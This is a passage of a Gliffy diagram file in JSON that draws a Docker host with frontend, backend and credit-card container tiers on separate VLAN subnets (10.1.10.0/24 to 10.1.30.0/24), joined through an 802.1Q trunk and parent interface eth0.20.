","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":340,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":91,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.40277777777794,"y":126.43727235088903,"rotation":0.0,"id":486,"width":121.19444444444446,"height":250.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":88,"lockAspectRatio":false,"lockShape":false,"children":[{"x":236.18596420940128,"y":158.89044937932732,"rotation":0.0,"id":449,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":53,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.49151976495682,-152.05853787273531],[-121.49151976495682,-81.64750068755309],[-229.68596420940125,-81.64750068755139],[-229.68596420940125,-33.27817949077674]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-179.77677617521388,"y":56.523633779319084,"rotation":0.0,"id":450,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":51,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.0545539529992,186.6444547140887],[291.0545539529992,117.79470574474337],[186.276776175214,117.79470574474337],[186.276776175214,67.8640963321146]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":447.0,"y":150.01008788486848,"rotation":0.0,"id":472,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":87,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":473,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":86,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":474,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":84,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":475,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":82,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":101.71008483311067,"rotation":0.0,"id":477,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":80,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.30.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":350.51767083236393,"y":87.47159983339776,"rotation":0.0,"id":478,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":79,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#cc0000","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":94.0,"y":155.01008788486848,"rotation":0.0,"id":463,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":78,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":464,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":77,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":465,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":75,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":466,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":73,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":80.0,"y":109.71008483311067,"rotation":0.0,"id":468,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":71,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.10.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.51767083236396,"y":95.47159983339776,"rotation":0.0,"id":469,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":70,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#38761d","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":341.0,"y":40.010087884868476,"rotation":0.0,"id":460,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":69,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":417,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":68,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":418,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":66,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":419,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":198.51767083236396,"y":41.471599833397754,"rotation":0.0,"id":459,"width":175.20345848455912,"height":79.73848499971291,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":62,"lockAspectRatio":false,"lockShape":false,"children":[{"x":17.482329167636067,"y":14.23848499971291,"rotation":0.0,"id":458,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":61,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.20.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":330,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":59,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#ff9900","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":279.0,"y":129.01008788486848,"rotation":0.0,"id":440,"width":5.0,"height":227.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#ff9900","fillColor":"#ff9900","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[4.000000000000057,-25.08952732449731],[4.000000000000114,176.01117206537933]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":56.0,"y":503.0913886978766,"rotation":0.0,"id":386,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":48,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Frontend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":420.0100878848684,"rotation":0.0,"id":381,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":41,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":382,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":383,"width":98.00597014925374,"height":44.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.10.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":384,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":385,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":382.0,"y":420.0100878848684,"rotation":0.0,"id":376,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":31,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":377,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":378,"width":98.00597014925374,"height":44.0,"uid":null,"order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.30.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":379,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":380,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":214.0,"y":503.0100878848685,"rotation":0.0,"id":374,"width":135.0,"height":20.162601626016258,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Backend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":376.0,"y":502.0100878848684,"rotation":0.0,"id":373,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Credit Cards

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":627.0,"y":99.94304076572786,"rotation":0.0,"id":364,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":25,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":363,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":342,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-183.0,310.0670471191406],[-183.0,292.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":410.0100878848684,"rotation":0.0,"id":363,"width":144.0,"height":117.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":218.0,"y":341.5100878848684,"rotation":0.0,"id":366,"width":132.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.20

VLAN ID: 20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":297.0,"y":89.94304076572786,"rotation":0.0,"id":356,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":22,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":353,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":343,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-13.0,320.0670471191406],[-13.0,302.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":222.0,"y":420.0100878848684,"rotation":0.0,"id":348,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":349,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":350,"width":98.00597014925374,"height":44.0,"uid":null,"order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":351,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":352,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":13,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":410.0100878848684,"rotation":0.0,"id":353,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":332.0100878848684,"rotation":0.0,"id":343,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":203.0,"y":307.5100878848684,"rotation":0.0,"id":333,"width":160.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 Interface

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":303.0,"y":240.51008788486845,"rotation":0.0,"id":323,"width":261.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":8,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

802.1Q Trunk - can be a single Ethernet link or Multiple Bonded Ethernet links

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.0,"y":291.0100878848684,"rotation":0.0,"id":290,"width":497.0,"height":80.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":543.5100878848684,"rotation":0.0,"id":282,"width":569.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host: Frontend, Backend & Credit Card App Tiers are Isolated but can still communicate inside parent interface or any other Docker hosts using the VLAN ID

